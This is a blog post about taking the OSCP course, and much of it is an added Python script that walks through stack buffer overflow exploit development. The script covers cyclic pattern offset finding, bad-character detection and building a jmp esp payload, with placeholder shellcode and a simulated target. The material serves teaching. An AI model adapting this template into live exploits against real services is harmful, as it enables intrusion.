I started the OSCP a couple of weeks ago, and I’m about halfway. It’s been pretty good so far, lots of interesting stuff, with a very practical edge. The difficulty level is pitched very well, all of the examples are designed to be followed along, which is a plus. Of course I’ve had some challenges, like wondering why my bind shell exploit isn’t connecting to my netcat listener, but I like to think of those moments as (extremely frustrating) learning experiences.
My only complaint so far would have to be the lack of theory. The examples are great, and very practical, but there’s no background, just the technical steps. For example, with a buffer overflow, you send the data, a unique string, a list of all hex characters, a return address, shellcode, in that order (or thereabouts). But, why does that work? I understand why the process works, but what about why the computer is doing that? I (personally) think that it’s important to know what the deal with the stack is, and how EIP is being overwritten, or to learn a little bit of assembly when looking for a jmp esp instruction, to really understand what’s going on, instead of just following a procedure.
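To put the "why" next to the procedure above, here is the attacker-side tooling for each of those steps in one script: generate the unique (cyclic) string, recover the EIP offset from the value a debugger shows after the crash, send the all-bytes string and find which bytes the target mangles, then lay out padding, return address, NOP sled and shellcode. This is an added example written for this post, not code from the course or the author. The `jmp esp` address (0x080414c3), the "target" that silently strips line-feed and carriage-return bytes, and the `0xcc` (int3) bytes standing in for real shellcode are all constructed for the demo.

```python
import string
import struct

# Step 1: a cyclic pattern in the msf pattern_create style. Every 3-byte
# window is unique, so whatever lands in EIP tells us the exact offset.
FULL_PATTERN_LEN = 26 * 26 * 10 * 3  # 20280 bytes before the pattern repeats

def pattern_create(length):
    pattern = "".join(u + l + d
                      for u in string.ascii_uppercase
                      for l in string.ascii_lowercase
                      for d in string.digits)
    if length > len(pattern):
        raise ValueError("pattern would repeat beyond %d bytes" % len(pattern))
    return pattern[:length]

def pattern_offset(eip_value):
    """Offset of the 4 bytes now in EIP. x86 is little-endian, so EIP=0x41336241
    was loaded from the bytes 41 62 33 41, i.e. 'Ab3A' in the pattern."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(FULL_PATTERN_LEN).encode("ascii").find(needle)  # -1 if not from the pattern

# Step 2: bad characters. Send every byte value, compare with what the
# debugger shows on the stack; the first mismatch is a byte the target
# mangles (0x00 is excluded up front because it terminates C strings).
def badchar_string(exclude):
    return bytes(b for b in range(0x01, 0x100) if b not in exclude)

def first_badchar(sent, observed):
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None

def simulate_target(data, stripped=(0x0a, 0x0d)):
    # Constructed stand-in for the vulnerable service: pretend it drops \n and \r.
    return bytes(b for b in data if b not in stripped)

def find_badchars(target=simulate_target):
    """Resend with each discovered bad byte removed, because everything after
    the first mangled byte is unreliable in a single run."""
    bad = {0x00}
    while True:
        sent = badchar_string(bad)
        b = first_badchar(sent, target(sent))
        if b is None:
            return sorted(bad)
        bad.add(b)

# Step 3/4: return address and shellcode. The saved return address sits above
# the local buffer on the stack; bytes past the buffer's end overwrite it, and
# `ret` pops it into EIP. A `jmp esp` there works because at that moment ESP
# points just past the return address, i.e. at the NOP sled we appended.
JMP_ESP = 0x080414c3  # hypothetical address of a `jmp esp` gadget

def build_payload(offset, ret_addr, shellcode, badchars, nop_len=16):
    payload = (b"A" * offset
               + struct.pack("<I", ret_addr)   # little-endian, like EIP expects
               + b"\x90" * nop_len              # NOP sled absorbs small ESP variation
               + shellcode)
    clash = sorted(b for b in set(payload) if b in badchars)
    if clash:
        raise ValueError("payload contains bad chars: %s" % [hex(b) for b in clash])
    return payload

if __name__ == "__main__":
    print(pattern_create(40))                  # what you send on the first crash
    offset = pattern_offset(0x41336241)        # value the debugger showed in EIP
    print("EIP offset:", offset)
    bad = find_badchars()
    print("bad chars:", [hex(b) for b in bad])
    shellcode = b"\xcc" * 4                    # int3 breakpoints, stand-in for real shellcode
    print(build_payload(offset, JMP_ESP, shellcode, bad).hex())
```

Against a real target, `simulate_target` is replaced by sending the bytes over the socket and reading the stack dump from the debugger, and `JMP_ESP` comes from a module without ASLR or protections; the rest of the script stays the same.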
Either way, here’s hoping the exam isn’t too much harder than the labs.